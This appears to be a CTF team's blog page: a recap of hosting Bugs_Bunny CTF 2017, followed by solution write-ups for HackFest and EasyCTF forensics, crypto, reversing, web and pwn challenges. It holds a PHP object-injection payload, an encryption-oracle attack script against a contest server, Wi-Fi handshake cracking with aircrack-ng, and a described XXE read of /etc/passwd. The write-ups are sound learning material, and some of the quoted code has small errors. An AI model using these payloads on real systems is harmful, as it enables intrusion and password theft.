Bugs_BunnyCTF 2k17


    Bugs_Bunny CTF 2k17 - International edition 
    During the 29th and 30th of july 2017, we created and hosted Bugs_BunnyCTF 2k17 an international contest in which more than 400 teams from all over the world took part.
    This was our first experience to host a capture the flag contest.

    In this contest we are delighted to share our passion and experience by offering a several missions and challenges like web exploitation, forensics,steganography,cryptography, etc.. in order to make challengers improve their skills when they having fun. Together we will dive challenger in a digital world where they have to conquer other skilled teams and one team shall be crowned.

    This challenge was for 24h of competition between challengers also it was a real challenge for us to maintain our 5 servers up and on line against hackers want to gain an access on our servers and others want to shutdown our server using attacks like DDOS attack.
    Fortunately none of hackers can gain access on our servers, but unfortunately some of hackers who want to shutdown our servers they succeed to make the latter freezing and in some situations we were obliged to reboot the server.

    Next year we will be more attentive in the setup of our server, to maintain all DDOS attack without any freezing in our server or reboot need.

    All this happened thanks to this greate team which is composed of:

    -Aymen Borgi
    -Bilel Korbosli(BilKor)
    -Chouaib hammami
    -Fakhri Mabrouki
    -Iheb ben salem(Sold1r)
    -Mohamed chamli(TnMch)


    Here is some statistics

    We have created more than 50 tasks from easiest to hardest.




    Plot 1
    Plot 3





    Feedbacks about the contest




      Feedbacks from ctftime.org ?!
      Participate again in the CTF ?!


      Write-ups links 
      https://ctftime.org/event/490/tasks/
      https://advancedpersistentjest.com/2017/07/31/writeups-rev75-simplephp-pwn100-bugs-bunny-ctf/
      https://aadityapurani.com/2017/07/30/bugs-bunny-ctf-writeups/
      https://st98.github.io/diary/posts/2017-08-01-bugs-bunny-ctf-2k17.html

      Hopefully see you next year, in the second edition of Bugs_BunnyCTF with many new and exciting challenges and many others surprises.

      Goodbye.

      HackFest_CTF{Final_R0und_Writeups}


      For10 ,Forensic,10 pt {by BilelKor}

      We were given a packet capture containing a wifi handshake .The first thing we want to do is to open up this file in Wireshark. Once this file is open, we can see that we indeed have a wireless frames from which we need to extract the key password . All we need is to crack the password  ,using Aircrack and rockyou worldlist.

      aircrack-ng for10.cap -w rockyou-10.txt 
       
      Here am using diffrent parts of the rockyou word list ,you can download the full list from this link http://scrapmaker.com/data/wordlists/dictionaries/rockyou.txt


      The flag is : hackfest{jennifer}
      Rev10 ,Reverse , 10 pt {by S0ld1er}
      You can easily get the flag using strings and grep

      strings rev10.exe | grep "hack" 
       



      The flag is : hackfest{f1ae14dfb0f46fc4ab1998fe98bc51c8}
      web50 ,Web ,50 pt {by Chouaib}

      Honestly i forget the task what said exactly , but the topic is to get the Flag , so let move to the php code source to see how it works . Code :
      <?php
      function print_flag(){
          print file_get_contents('/var/www/flag.txt');
      
      }
      class Hackfest
      {     private $hook;
          function __toString();
          {   if (isset($this->hook)) eval($this->hook);
          }
      }
      if(!empty($GET_['msg'])){
          $user_date = unserialize($GET['msg']);
      }
      
      ?>
      Hello!
      

      Humm , so as i see there is a parameter 'mgs' using GET Method and Unserialize() function , so quickly view how it works in php.net .



      As we can see there is  a Warning about using this function to expose PHP Object Injection , Ref: https://www.owasp.org/index.php/PHP_Object_Injection .

      Let's exploit it and get the flag, Rule:

      O::"":1:{s::"";s:length_file:"file";}
      
      So ,I generate my payload:

         O:8:"Hackfest":1:{s:14:"Hackfest hook";s:13:"print_flag();";} 
      
      and then i encoded it with url_encode what gave me the flag :

      O%3A8%3A%22Hackfest%22%3A1%3A%7Bs%3A14%3A%22Hackfest%20hook%22%3Bs%3A1
      3%3A%22print_flag()%3B%22%3B%7D%20

      Forensic Malware Analysis ,50 pt {by Chouaib }
      This task is talking about to analysis this malware they gave us to get IP and Port which connected with , so ,I have some problem with virtual machine to run it there , so I searched for malware analysis tools online . 

      At last i got one website to online malware analysis which gave me Traffic Packet file then with simple analysis I have noticed this weird connection 
       "From IP:1028 to 193.95.68.245:81" so this the flag : hackfest{193.95.68.245:81}
      Crypto10 ,Cryptography, 10 pt {by Aymen Borgi}
      At the first sight ,I thought about XOR encryption that's why finding the key was my first goal, it was very easy to find .


      EE was reapeted many times in the signature of the file that's why I thought that EE is our key ,so,we wrote this dirty code :

      b = bytearray(open('crypto10.enc', 'rb').read())
      l=0xEE
      for i in range(len(b)):
          b[i] ^= l
      open('b', 'wb').write(b)
      
      and finaly we got a picture contain the flag :D

      Rev50 ,Reverse , 50 pt {by Aymen Borgi}
      The idea was very sample , using jd-gui to decompile the file , then looking at the java code the program uses xor encryption to encrypt elements of 2 tables .so we wrote this python script to get the flag

      a = [114, 121, 126, 116, 115, 114, 109, 110, 98, 41, 122, 43, 125, 25, 41, 126, 46, 45, 123, 45, 39, 41, 45, 35, 66, 45, 47, 38, 43, 122, 47, 120, 35, 122, 33, 70, 126, 33, 47, 34, 112, 100]
      b = [26, 24, 29, 31, 21, 23, 30, 26, 25, 31, 30, 30, 28, 32, 30, 31, 29, 21, 30, 31, 21, 30, 20, 21, 32, 29, 24, 23, 24, 31, 22, 25, 26, 28, 21, 32, 24, 21, 30, 20, 21, 25]
      l=[]
      for i in range(len(a)):
          l.append(chr(a[i] ^ b[i]))
      
      print ''.join(l)
      
       

      and finally we got the flag : hackfest{6d5a97a38e22796b0713e9a9f4ff416e} 
      Only your gun to solve this challenge is understanding java that's all ;)

      Crypto75 ,Cryptography , 75 pt {by Bilel Korbosli}
      We have already solved this challenge before ,edit the source code and change it a little bit  .
      Check out our previous write up about this challenge http://0xbugsbunny.blogspot.com/2016/08/icectfStage3l33tcrypt.html
      Code : 

      import socket
      import base64
      
      def netcat(hostname, port, content):
          s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
          s.connect((hostname, port))
          data = s.recv(1024)
          s.sendall(content)
          s.shutdown(socket.SHUT_WR)
          data = s.recv(220)
          s.close()
          return data
          
      sd="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
      a=['0','1','2','3','4','5','6','7','8','9','a','b','c','e','f']
      for j in range(112):
       sd=sd[:len(sd)-1]
       dt = base64.b64encode(sd)
       f1 = netcat("challenge.hackfest.tn",3001,dt+"\n")
       f1 =f1[:-2]
       f1 = base64.b64decode(f1).encode('hex')[:224]
       print '::'+f1
       for k in a:
        dt = base64.b64encode(sd+flag+k)
        f2 = netcat("challenge.hackfest.tn",3001,dt+"\n")
        f2 = f2[:-2]
        print str(chr(k))
        f2 = base64.b64decode(f2).encode('hex')[:224]
        if f2 == f1 :
         flag += str(chr(k))
         break
       print "flag : "+flag+"\n"
       #flag ="25583d232ef6b1cafbc32f0a947a60ba"
       
      Crypto50 ,Cryptography , 50 pt {by Bilel Korbosli}

      We were given an e,c ,n it's obviously RSA-Winners attack .

      #!/usr/bin/python  
      import ContinuedFractions, Arithmetic  
      import time  
      import sys  
      import base64  
      import binascii  
      import gmpy  
      import sympy  
      import math  
      import fractions  
      import struct  
      sys.setrecursionlimit(100000)  
      # modulus from the RSA public key  
      n=0x331702c5fe01f2401c9e44ec0ba79e4fc0c1a8498b27a7433f54381f6be8cbb339246020716082c3ebe83ba3e6af2feb5468332ae27e1dd5bcc82d9201aba81c1c90c1edebbb0661b8a0a38739ccbcfd933f0323883b6379ffa62a5d71e406b7c3ba6314c49eaf0d70be47210d22a8baae4be89d8db620cb976d032a29ac3bc771334e80479f54b07a39a6791bb434b713d6a3f428612404a55cb3a787e5d13e26eae8beb8b52e4f724a83eb04230fac17aced7dece0b7ed44da60ece5ddf67c727dd83a5e8a0cf24303856ac41eaed01c82577fdf0761e31bfcc3b51227cef59c5dd154ba8a616eddc2cc1bd86fd04facd29a76af6482cb1cdcecfeedf3ec989633848f6e662fd7a5dbcd5603534d463c87884053ea56c29849bc34f9eac4cea4e76a2a28bbd3ae352f1b65f4103f37d7276d02edc14ec3616a570fa86e68ba0b8aaf7573572481cdf826565f0231fc8d9948e0420821844238a794fba9674a77b81a5e60963920fbb5e8220ce1ab189be0db33ed9444a011e1f6b09e6e83dec67a6bcc67e5e6ced247aa2af1189d31f55ad43302f31971aaf4cdaa2d8f91ba0db625845b0c6712998e1655643bda5ac7177a6ea5014f73615b25958b959a78550eb8378177c3cf23f9f882b17f2c9d71fce410295f7b1dcfa439da0a8e1548017a888b202a3c6c504acacb743b5c8719a69b653687feb1a25682a5b057d7579
      # exponent from the RSA public key  
      e=0x2c398be3121d210e2f54dba688a0f16275adcbb1f2c0337a6d52c6eb0f7c86057337e5125a707ae5c24918e387a7cbcd5035120d0a0ebea4a4b3eb4c5dc93d7baacbc1e33e10d734b15f184fa9d00707f9d34446c0b380254e834bd1208473c1b4694750dbe9b2ba74157eec537d53279f2894232f256b98b916a50b7895d404e495f84457fd599e5fb3b84d32d2973be79c549aac88a9e7cfb8208a125c3da6efb66f84fabc1d97da5bdc45c37c1ef73c3f950bba9cb26baa047a72693d0c3fdd038cf348b532737237dc7a4bd5533e47ae9c3fed6e463d98b67f0abb465643c3e5c07d7940d2ff3ea2685e1ac5a2ee30088017f7db15761874a67c0a687a89c1200d3858bad042e4174fc04cb3ca586d76e0a764a76e00b78fa32c9aa2ad049dd7782929845d682568ff57f7b6bb75c725e7b3ab03fbea276e523a4c1e16019b8c2a6cd9b610df24279661e3a188e8434dec2a8b828fdb6ecffe9fbbb10297ca22399b12059df442b4cf3c2b4c40fb4cb0ee6d4e55bebd3b053980dfee2dd448c2ba40fcaf33145b9e0f85f4463f4c140d3a844b7bae984adda02a9351d71d6885dad5ebee5c69910c918b5e6dca28a0f4298280f1b87b53e4f7915177a091f22f2cd6adc39ad76a1db15c701a1e9d5a8ee6b679630544ba11bea1fcb5b043cd5cedd93ce3b9d4326040ede6c669dc7aa2e017f2ada73c7283eb124aac8728b
      c=0x3e988e36b1bacb70da1464ee98a1679f55c73be7e8d3a69c1d107b54bb47bd44a5b0575fb003124c94d63bacb7148fcce143074cf5e4f61b23cd7e1bca2ed087aa2c275a2cfc6e517fa45680f1fed33ba4d646e8cc235bafca6446b4c584d959b0f1aec674d49238e35da1b5cec2b5c8f04840d69002a270ff1478eb7ecd0a87fd85b58d62e1b01f62466b8e55fedb1ca6ad4a0463d41f838ab7db9f5ffc0736438d2510931519d6727d1f38db0130d916de54793e56feb36910905cedd72c5679cffaaacd66be5b31b69c9f8f8435213dd57e646b9fe3c51b1fe932386ebe7116a12dbf661c24dff9b5d6b3e31bf409e0e54a63835365dff562bc8fa6643212586580d56081d96de852b0457c9b773756d7513e510824bdee43fc231ee1262a7a42f79110c37bc4b162d627b0fc34091cf8ee2c0d70cc650cc1260ca97c0e2b4e6e019fbee52cb42fd1ff35ea34c593ed49427c9d7231bace5aacc77d466d0fe478a773822b8851c15ac32368b4fdf6ed7a037b2f0d4e9b391ee187b5981664f4876559360537db6fc0c96ac69976ccce6350289f825554e704144937cded3b4611ddf8301626b2234092daf8dbd4d39c98ea0b1fed0006525a7d2b700194e3450c6000548dacd1a4935e8a03949d4a957b180c659f91cf34e5b29b47e1b4267ed037b5b7a290539fd752d22fda32e46ed4c3cd595687e8e2e26db8f9415794
      def hack_RSA(e,n):  
        print "Performing Wiener's attack. Don't Laugh..."  
        time.sleep(1)  
        frac = ContinuedFractions.rational_to_contfrac(e, n)  
        convergents = ContinuedFractions.convergents_from_contfrac(frac)  
        for (k,d) in convergents:  
          #check if d is actually the key  
          if k!=0 and (e*d-1)%k == 0:  
            phi = (e*d-1)//k  
            s = n - phi + 1  
            # check if the equation x^2 - s*x + n = 0  
            # has integer roots  
            discr = s*s - 4*n  
            if(discr>=0):  
              t = Arithmetic.is_perfect_square(discr)  
              if t!=-1 and (s+t)%2==0:  
                return d  
      hacked_d = hack_RSA(e, n)  
      print "d=" + str(hacked_d)  
      m = pow(c, hacked_d, n)  
      print "So the flag is:"  
      print("%0512x" %m).decode("hex")  
       


      Welcome ,Misc , -50 pt
      Just DO_NOT_SUBMIT_THE_FLAG !!!!!!!! (thanks to our hero we got -50 pt -_- )
      pwn50 , pwn ,50 pt {by Bilel Korbosli}
      the task takes the first 8 numbers of the rand and saves the number in the 10th olace of the stack.



      we solve it locally for the write-up ,we are sorry ,we forgot to save the flag in live session. 

      Hackfest{2k17_online_Quals_writeUps}


      Crypto ,1 pt

      My agent intercepted the following message.

      4b4241494f4c5e594251471a67196e1e751958495a531a1d58135a1e73621b757559191319641e5866467
      5731a411f646e1b78196e191d75751a19686775581a7519787a441a75191a1d4875137f0b590b0b7d 
       

      It is encrypted using a homemade cryptographic algorithm! He managed also to find which server encrypted the message! 
      You can access it from: nc challenge.hackfest.tn 3001 Can you decrypt the message for us?

      The server reads the user input , encrypt it and return a hex string.We have generated it all the possible characters and then wrote another script to decrypt the script , this makes the process more faster than using nc to guess the next hex !

      #!/bin/python
      #Crypto 1
      ch = "!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}"
      secret=["41","49","4f","4c","5e","59","42","51","47","1a","67","19","6e","1e","75","19","58","49","5a","53","1a","1d","58","13","5a","1e","73","62","1b","75","75","59","19","13","19","64","1e","58","66","46","75","73","1a","41","1f","64","6e","1b","78","19","6e","19","1d","75","75","1a","19","68","67","75","58","1a","75","19","78","7a","44","1a","75","19","1a","1d","48","75","13","7f","0b","59","0b","0b","7d"]
      c=['0b', '08', '09', '0e', '0f', '0c', '0d', '02', '03', '00', '01', '06', '07', '04', '05', '1a', '1b', '18', '19', '1e', '1f', '1c', '1d', '12', '13', '10', '11', '16', '17', '14', '15', '6a', '6b', '68', '69', '6e', '6f', '6c', '6d', '62', '63', '60', '61', '66', '67', '64', '65', '7a', '7b', '78', '79', '7e', '7f', '7c', '7d', '72', '73', '70', '71', '76', '77', '74', '75', '4a', '4b', '48', '49', '4e', '4f', '4c', '4d', '42', '43', '40', '41', '46', '47', '44', '45', '5a', '5b', '58', '59', '5e', '5f', '5c', '5d', '52', '53', '50', '51', '56', '7d']
      flag=""
      print ch[c.index("49")-1]
      for j in range(0,100,2):
       flag+=ch[c.index(secret[j+1])]
       flag+=ch[c.index(secret[j])]
       print flag
       


      Web ,1 pt
      At the first sight, the task looks weird! nothing works, no response from the server, Maybe a blind SQL injection, but no way !! nothing special. I have launched fuzzer usernames and passwords and we got this message for username = test and password = test





      Now we are sure , the vulnerability is in the DB and the username is "admin" , trying some tricks then test the NoSQL injection ! ! and here we go we got the flag! [this reminds me of the IceCTF task ]



      Rev ,1 pt
      The task is an encrypted python script 


      #!/usr/bin/env python
      # -*- coding: rot13 -*-
      
      #import sys
      
      o = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'.qrpbqr("rot13")
      
      vs olgrf == fge:
          vd = ynzoqn f: znc(beq, f)
          od = ynzoqn f: ''.wbva(znc(pue, f))
          ohssre = ynzoqn f: f
      
      qrs r(i):
      
          by = yra(i)
          i = i.yfgevc(o'\0')
          ay = yra(i)
      
          c, k = 1, 0
          sbe p va vd(i[::-1]):
              k += c * p
              c = c << 8
      
          e = ''
          juvyr k > 0:
              k, z = qvizbq(k, 58)
              e += o[z]
      
          erghea (e + o[0] * (by - ay))[::-1]
      
      
      cevag 'Flag:',
      synt = enj_vachg()
      vs r(synt) == "2GYhdiSLoJTRvASGXjIHtatb9Kdr":
          cevag ":)"
      ryfr:
          cevag ":("
      
       


      Decrypt the code with ROT13 and now we can read the script !


      #!/hfe/ova/rai clguba
      # -*- pbqvat: ebg13 -*-
      
      #vzcbeg flf
      
      b = '123456789NOPQRSTUWXYZACDEFGHIJKLMnopqrstuvwxzabcdefghijklm'.decode("ebg13")
      
      if bytes == str:
          iq = lambda s: map(ord, s)
          bq = lambda s: ''.join(map(chr, s))
          buffer = lambda s: s
      
      def e(v):
      
          ol = len(v)
          v = v.lstrip(b'\0')
          nl = len(v)
      
          p, x = 1, 0
          for c in iq(v[::-1]):
              x += p * c
              p = p << 8
      
          r = ''
          while x > 0:
              x, m = divmod(x, 58)
              r += b[m]
      
          return (r + b[0] * (ol - nl))[::-1]
      
      
      print 'Synt:',
      flag = raw_input()
      if e(flag) == "2TLuqvFYbWGEiNFTKwVUgngo9Xqe":
          print ":)"
      else:
          print ":("
      
      
       
      After same analysis, the script convert the user inputs into ASCII, use the divmod(ASCII,58) function then get a character of the division "/" and mod() from b variable which is encrypted with ROT(13) and reverse the string!
      example !




      Google it a while and we got this script to decrypt the msg

      import sys
      
      val='i'
      
      from hashlib import sha256
      
      # 58 character alphabet used
      alphabet = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'.encode("rot13")
      
      
      if bytes == str:  # python2
          iseq = lambda s: map(ord, s)
          bseq = lambda s: ''.join(map(chr, s))
          buffer = lambda s: s
      
      def b58encode(v):
      
          origlen = len(v)
          v = v.lstrip(b'\0')
          newlen = len(v)
      
          p, acc = 1, 0
          for c in iseq(v[::-1]):
              acc += p * c
              p = p << 8
      
          result = ''
          while acc > 0:
              acc, mod = divmod(acc, 58)
              result += alphabet[mod]
      
          return (result + alphabet[0] * (origlen - newlen))[::-1]
      
      
      def b58decode(v):
      
          if not isinstance(v, str):
              v = v.decode('ascii')
      
          origlen = len(v)
          v = v.lstrip(alphabet[0])
          newlen = len(v)
      
          p, acc = 1, 0
          for c in v[::-1]:
              acc += p * alphabet.index(c)
              p *= 58
      
          result = []
          while acc > 0:
              acc, mod = divmod(acc, 256)
              result.append(mod)
      
          return (bseq(result) + b'\0' * (origlen - newlen))[::-1]
      
      print 'Input:\t',val
      print 'encode' ,b58encode(val)
      print 'Base58:\t',b58decode("2GYhdiSLoJTRvASGXjIHtatb9Kdr")
       

      The flag is : hackfest{it_was_b58}
      PWN , 1 pt
      The task accepts only a few characters, and the allowed ones are 0123456789.+-/%*<>!=[]() 
       ,If we could write something with []()! then we can read the flag , we have used an online tool called Jsfuck http://www.jsfuck.com/


      and the flag is !



      Web, 10pt
      An xml format sent to the server ! its obvious XXE xml vulnerability ! similar to the root me task! , doing same tests , adding an entity and execute a cmd ! and we got this 
      URL encode of the the request ! . Our request was for ! /etc/passwd




      Let's now read the flag !



      hackfest{XML_1s_l1k3_vi0l3nc3_1f_1t_d0e5n_T_s0lv3_y0ur_prOblem_y0U_re_n0t_us1n9_en0uGh_0f_iT}

      Misc, 1pt
      Do we really need a write up for this one ! !? :p just submit the flag XD !
      For 10

      EasyCTF 2017{Tasks_WriteUps}


      Hash on Hash , Cryptography , 100 pt  -solved by chouaib(cho)
      Task 
      There's a lot of hex strings here. Maybe they're hiding a message? 
      Hint: Thankfully you can solve this without even using a website
      HexStrings file 

      The first thing that  We have hex strings file and we noticed it's MD5 hashes and every 256 char MD5's means one letter so we can make it easy and Solved with https://hashkiller.co.uk/md5-decrypter.aspx

      This is what we got !

      The first thing that  Im far too lazy to put anything meaningful here. Instead, here's some information about what you just solved. The MD5 algorithm is a widely used hash function producing a 128-bit hash value. Although MD5 was initially designed to be used as a cryptographic hash function, it has been found to suffer from extensive vulnerabilities. It can still be used as a checksum to verify data integrity, but only against unintentional corruption. Like most hash functions, MD5 is neither encryption nor encoding. It can be cracked by brute-force attack and suffers from extensive vulnerabilities as detailed in the security section below. MD5 was designed by Ronald Rivest in 1991 to replace an earlier hash function MD4.[3] The source code in RFC 1321 contains a "by attribution" RSA license. The abbreviation "MD" stands for "Message Digest." The security of the MD5 has been severely compromised, with its weaknesses having been exploited in the field, most infamously by the Flame malware in 2012. The CMU Software Engineering Institute considers MD5 essentially "cryptographically broken and unsuitable for further use". easyctf{1_h0p3_y0u_d1dn7_d0_7h47_by_h4nd}

      the flag is : easyctf{1_h0p3_y0u_d1dn7_d0_7h47_by_h4nd}

      RSA1, Cryptography ,50 pt - solved by Chouaib(cho) 
      Task 
      The first thing that  I found somebody's notes on their private RSA! Help me crack this. 
      Hint: Go google RSA if you're stuck. 

      File = ciphertest1.txt p: 

      p: 33499881069427614105926941260008415630190853527846401734073924527104092366847259
      q: 34311544767652906613104559081988349779622789386528780506962212898921316785995851
      e: 65537
      c: 43465248299278658712013216049003172427898782261990372316282214376041873514481386908793943532363461126240609464283533882761307749486816342864113338277082746552
       
       
      The first thing that  So,I wrote this humble script to solve this problem using gmpy Module :

      import gmpy
      
      p = 33499881069427614105926941260008415630190853527846401734073924527104092366847259
      q = 34311544767652906613104559081988349779622789386528780506962212898921316785995851
      e = 65537
      c = 43465248299278658712013216049003172427898782261990372316282214376041873514481386908793943532363461126240609464283533882761307749486816342864113338277082746552
      
      f = (p-1) * (q-1)
      
      d = gmpy.invert(e,f)
      
      print "private key d value is : %d" % d 
      plain = hex(pow(c,d,n))[2:]
      flag = plain.decode("hex")
      print "The Flag is %s "  % flag 
       
      Decode me , Cryptography ,100 pt -solved by Chouaib (cho)
      Task 
      Someone I met today told me that they had a perfect encryption method. To prove that there is no such thing, I want you to decrypt this encrypted flag he gave me. 

      Hint: Simple decoding :)

      The first thing that  The input in the end of file is " = " what make me release it is base64. The input in the end of file is " = " what make me released it is base64 but the file file size too long so i need to decrypt it many time until i found the Flag. So I wrote a short python script to do that using the Base64 Module .
      import base64
      
      file = open('file.txt').read()
      dec = lambda x :base64.b64decode(file)
      flag = dec(file)
      while 'easyctf' not in flag:
          flag = base64.b64decode(flag)
      print flag
      


       the flag is : easyctf{what_1s_l0v3_bby_don7_hurt_m3}

      RSA2 , Cryptography , 80 pt - solved by Chouaib(cho)

      Task 
      The first thing that  some more RSA : This time, there's no P and Q .. this :

      n: 266965481915457805187702917726550329693157
      e: 65537
      c: 78670065603555615007383828728708393504251
       

      Hint: Simple decoding :)

      As you see above there's no P and Q i had only N , so i used http://factordb.com/ to get the Prime Factor of P and Q :

       p = 458070420083487550883
      q = 582804455845022449879



      And then i wrote this script to the flag of RSA challenge also using gmpy Module that supports multiple-precision arithmetic :

       import gmpy
      
      n = 266965481915457805187702917726550329693157
      p = 458070420083487550883
      q = 582804455845022449879
      e = 65537
      c = 78670065603555615007383828728708393504251
      f = (p-1) * (q-1)
      
      d = gmpy.invert(e,f)
      plain = hex(pow(c,d,n))[2:]
      flag = plain.decode("hex")
      print "The Flag is %s "  % flag
       
      the is flag : flag{l0w_n_0eb6}
      RSA3, Cryptography , 135 pt  -solved by chouaib(cho)
      Task 
      We can across another message that follows the same cryptographic schema as those other RSA message. Take a look and see if you can crack it . 

      Hint: You might want to read up on how RSA works.
      File:


       {N : e : c}
      {0x27335d21ca51432fa000ddf9e81f630314a0ef2e35d81a839584c5a7356b94934630ebfc2ef9c55b111e8c373f2db66ca3be0c0818b1d4eda7d53c1bd0067f66a12897099b5e322d85a8da45b72b828813af23L : 0x10001 : 0x9b9c138e0d473b6e6cf44acfa3becb358b91d0ba9bfb37bf11effcebf9e0fe4a86439e8217819c273ea5c1c5acfd70147533aa550aa70f2e07cc98be1a1b0ea36c0738d1c994c50b1bd633e3873fc0cb377e7L}
      
       
      Almost the same as the last RSA challenge there's no P and Q i had only N but as you can see clearly this time N , E , C is encrypted with base 16 (hex) so i need to take it back , and then using the http://factordb.com/ to get the Prime Factor of P and Q : This is my script to solve RSA3 :


      import gmpy
      
      n = int('0x27335d21ca51432fa000ddf9e81f630314a0ef2e35d81a839584c5a7356b94934630ebfc2ef9c55b111e8c373f2db66ca3be0c0818b1d4eda7d53c1bd0067f66a12897099b5e322d85a8da45b72b828813af23',16)
      e = int('0x10001',16)
      c = int('0x9b9c138e0d473b6e6cf44acfa3becb358b91d0ba9bfb37bf11effcebf9e0fe4a86439e8217819c273ea5c1c5acfd70147533aa550aa70f2e07cc98be1a1b0ea36c0738d1c994c50b1bd633e3873fc0cb377e7',16)
      
      """ p and q find on FactorDB """
      p = 3423616853305296708261404925903697485956036650315221001507285374258954087994492532947084586412780869
      q = 3423616853305296708261404925903697485956036650315221001507285374258954087994492532947084586412780871
      
      n=p*q
      f = (p-1) * (q-1)
      
      d = gmpy.invert(e,f)
      plain = hex(pow(c,d,n))[2:]
      flag = plain.decode("hex")
      print "The Flag is %s "  % flag  
      
      
      The Flag is easyctf{tw0_v3ry_merrry_tw1n_pr1m35!!_417c0d} 

      Flip my letters , Cryptography ,50 pt -solved by Chouaib (cho)
      Task 
      We have given a flag :easyctf{r_wlmg_vevm_mvvw_zm_zhxrr_gzyov} 

      Hint : What happens if you turn the alphabet upside down?

      Hummm alphabet upside down it is means decode the flag with Reverse Alphabet , I feel too lazy to write script so with simple search on Google for Atbash Cipher


      The flag is easyctf{i_dont_even_need_an_ascii_table}
      Let Me Be Frank , Cryptography ,50 pt -solved by S0ld1er

      Here we have the following text given:
      Nwh whdjwh qm uepen, T tjb fsmt tixgi jsrsh sigm gs mpzp xwqf iahxpv iw fslkt. pehgpxf{qtextz_glacz_elt_neinrw_qsg_bums_dcp}
       

      That might be Vigenère cipher , decoding the flag using Cryptool.



      YOUSHOULDBEHAPPYIPUTSOMEEXTRAWORDSHERETOMAKETHISEASIERTOSOLVE EASYCTF{BETTER_THANK_THE_FRENCH_FOR_THIS_ONE}

      Lowercase the flag 
      the flag is easyctf{better_thank_the_french_for_this_one}

      Phunky Python ,reverse ,50 pt -solved by S0ld1er

      The goal of this task is to find the correct value of x, so the script below prints out the word “easyctf”.
      x = 0 # REDACTED
      digs = [117734844603869328, 117734844603869324, 117734844603869342, 117734844603869348, 117734844603869326, 117734844603869343, 117734844603869329]
      out = ""
      for letter in reversed(digs):
          out = chr(letter - x) + out
      print out
      
       
      The first letter of the flag is "e", means 101 in ASCII. calculate the difference between the given value and x to get ord("e")= 101.YES, we love math :p



      Replace x with this value and check out the script 




      The flag is easyctf{117734844603869227L }

      luckyguess, reverse engineering 200 pt